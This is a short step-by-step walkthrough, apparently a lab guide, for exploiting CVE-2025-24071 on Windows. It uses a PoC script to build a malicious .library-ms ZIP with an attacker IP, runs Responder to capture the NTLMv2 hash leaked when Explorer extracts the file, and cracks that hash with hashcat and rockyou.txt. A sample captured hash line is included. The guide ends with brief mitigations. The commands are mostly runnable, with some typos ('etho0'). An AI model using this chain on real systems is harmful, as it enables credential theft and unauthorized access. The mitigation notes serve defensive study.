- Triggers automatic SMB authentication to an attacker-controlled share.
- No interaction required — Windows Explorer initiates this NTLM authentication automatically.
- Results in NTLMv2 hash leakage (information disclosure).
- Affects Windows 10/11 all versions, especially 11 23H2.
sudo apt update && sudo apt install responder -y
Start Responder
sudo responder -I eth0
Install required Python module
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
This will generate: testpayload.library-ms testpayload.zip
Transfer testpayload.zip to the Windows 11 test machine. Extract the ZIP using Windows File Explorer. This triggers Windows to try accessing the SMB path, leaking the NTLM hash.
responder -I etho0
create hash,txt file
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
most common rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
- Block outbound SMB (TCP 445) at firewalls.
- Disable automatic authentication to untrusted SMB shares (group policy).
- Monitor for .library-ms file extraction and SMB connections.